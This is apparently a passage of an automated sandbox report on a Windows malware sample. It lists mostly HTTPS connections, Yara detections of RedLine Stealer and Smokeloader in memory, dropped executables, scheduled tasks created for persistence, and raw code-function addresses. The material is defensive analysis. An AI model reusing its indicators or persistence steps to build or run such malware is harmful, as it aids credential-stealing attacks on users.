                          Source: unknownNetwork traffic detected: HTTP traffic on port 62314 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
                          Source: unknownNetwork traffic detected: HTTP traffic on port 58821 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 62274 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 58815 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 58914 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 62280 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50178 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50170 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62360
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50131
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50130
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 58823 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                          Source: unknownNetwork traffic detected: HTTP traffic on port 58817 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50148
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 62360 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
                          Source: unknownNetwork traffic detected: HTTP traffic on port 62273 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 62305 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 58816 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 62310 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50171 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62273
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50168
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50169
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50171
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50170
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50173
                          Source: unknownNetwork traffic detected: HTTP traffic on port 58910 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50172
                          Source: unknownNetwork traffic detected: HTTP traffic on port 62284 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 58818 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50168 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50443 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50357 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 62312 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 62278 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62310
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62312
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62313
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62314
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 58813 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50586
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50343
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 58916 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 58824 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50357
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50586 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 58911 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 62306 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58818
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58817
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58814
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58813
                          Source: unknownNetwork traffic detected: HTTP traffic on port 62307 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58816
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58815
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 58814 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                          Source: unknownNetwork traffic detected: HTTP traffic on port 58917 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50169 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50173 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58824
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58821
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58823
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 58912 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 62282 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50179 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50445
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62305
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62306
                          Source: unknownNetwork traffic detected: HTTP traffic on port 62313 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62307
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62308
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62309
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 58918 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
                          Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49710 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49712 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.6:49713 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49719 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 20.190.160.17:443 -> 192.168.2.6:49754 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49789 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.6:49814 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.6:49825 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:49826 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 18.66.102.82:443 -> 192.168.2.6:49827 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:49832 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:49834 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:49835 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49839 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:49889 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:49888 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:49886 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:49884 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:49885 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:49887 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:49893 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:49892 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49902 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49969 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:50148 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50169 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50170 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50168 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50172 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50173 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50171 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50178 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50179 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50177 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:50343 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 13.89.179.11:443 -> 192.168.2.6:50357 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50443 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50445 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:50586 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:58815 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:58816 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:58817 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:58814 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:58813 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:58818 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:58821 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:58824 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:58823 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:58912 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:58916 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:58918 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:62281 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:62280 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:62309 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:62308 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:62305 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:62310 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:62306 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:62307 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:62313 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:62314 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:62312 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:62360 version: TLS 1.2

                          System Summary

                          barindex
                          Malicious sample detected (through community Yara rule)
                          Source: 00000032.00000002.3040304288.00000000009EC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                          Source: 0000002F.00000002.2938541456.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                          Source: 00000032.00000002.3036489746.00000000007D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                          Source: 00000000.00000002.2524711199.00000000007F8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                          Source: 0000002F.00000002.2933859917.0000000000738000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                          Source: 00000000.00000002.2523988474.0000000000720000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                          PE file contains section with special chars
                          Source: userGDHIIIIEHC.exe.0.drStatic PE information: section name:
                          Source: userGDHIIIIEHC.exe.0.drStatic PE information: section name: .idata
                          Source: userGDHIIIIEHC.exe.0.drStatic PE information: section name:
                          Source: amadka[1].exe.0.drStatic PE information: section name:
                          Source: amadka[1].exe.0.drStatic PE information: section name: .idata
                          Source: amadka[1].exe.0.drStatic PE information: section name:
                          Source: RoamingCBGCBGCAFI.exe.0.drStatic PE information: section name:
                          Source: RoamingCBGCBGCAFI.exe.0.drStatic PE information: section name: .idata
                          Source: RoamingCBGCBGCAFI.exe.0.drStatic PE information: section name:
                          Source: explorti.exe.6.drStatic PE information: section name:
                          Source: explorti.exe.6.drStatic PE information: section name: .idata
                          Source: explorti.exe.6.drStatic PE information: section name:
                          Source: axplong.exe.23.drStatic PE information: section name:
                          Source: axplong.exe.23.drStatic PE information: section name: .idata
                          Source: axplong.exe.23.drStatic PE information: section name:
                          PE file has a writeable .text section
                          Source: num[1].exe.45.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA8B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,0_2_6CA8B700
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA8B8C0 rand_s,NtQueryVirtualMemory,0_2_6CA8B8C0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA8B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,0_2_6CA8B910
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA2F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,0_2_6CA2F280
                          Source: C:\Users\userGDHIIIIEHC.exeFile created: C:\Windows\Tasks\explorti.jobJump to behavior
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeFile created: C:\Windows\Tasks\axplong.job
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA834A00_2_6CA834A0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA8C4A00_2_6CA8C4A0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA36C800_2_6CA36C80
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA2D4E00_2_6CA2D4E0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA66CF00_2_6CA66CF0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA364C00_2_6CA364C0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA4D4D00_2_6CA4D4D0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA9542B0_2_6CA9542B
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA9AC000_2_6CA9AC00
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA65C100_2_6CA65C10
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA72C100_2_6CA72C10
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA354400_2_6CA35440
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA9545C0_2_6CA9545C
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA235A00_2_6CA235A0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA885F00_2_6CA885F0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA60DD00_2_6CA60DD0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA3FD000_2_6CA3FD00
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA4ED100_2_6CA4ED10
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA505120_2_6CA50512
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA84EA00_2_6CA84EA0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA8E6800_2_6CA8E680
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA45E900_2_6CA45E90
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA976E30_2_6CA976E3
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA2BEF00_2_6CA2BEF0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA3FEF00_2_6CA3FEF0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA89E300_2_6CA89E30
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA756000_2_6CA75600
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA67E100_2_6CA67E10
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA96E630_2_6CA96E63
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA2C6700_2_6CA2C670
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA446400_2_6CA44640
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA72E4E0_2_6CA72E4E
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA49E500_2_6CA49E50
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA63E500_2_6CA63E50
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA777A00_2_6CA777A0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA2DFE00_2_6CA2DFE0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA56FF00_2_6CA56FF0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA39F000_2_6CA39F00
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA677100_2_6CA67710
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA560A00_2_6CA560A0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA4C0E00_2_6CA4C0E0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA658E00_2_6CA658E0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA950C70_2_6CA950C7
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA6B8200_2_6CA6B820
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA748200_2_6CA74820
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA378100_2_6CA37810
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA6F0700_2_6CA6F070
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA488500_2_6CA48850
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA4D8500_2_6CA4D850
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA2C9A00_2_6CA2C9A0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA5D9B00_2_6CA5D9B0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA651900_2_6CA65190
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA829900_2_6CA82990
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA3D9600_2_6CA3D960
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA7B9700_2_6CA7B970
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA9B1700_2_6CA9B170
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA4A9400_2_6CA4A940
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA222A00_2_6CA222A0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA54AA00_2_6CA54AA0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA3CAB00_2_6CA3CAB0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA92AB00_2_6CA92AB0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA9BA900_2_6CA9BA90
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA41AF00_2_6CA41AF0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA6E2F00_2_6CA6E2F0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA68AC00_2_6CA68AC0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA69A600_2_6CA69A60
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA2F3800_2_6CA2F380
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA953C80_2_6CA953C8
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA6D3200_2_6CA6D320
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA3C3700_2_6CA3C370
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA253400_2_6CA25340
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CB2ECD00_2_6CB2ECD0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CACECC00_2_6CACECC0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CBAAC300_2_6CBAAC30
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CB96C000_2_6CB96C00
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CADAC600_2_6CADAC60
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CC5CDC00_2_6CC5CDC0
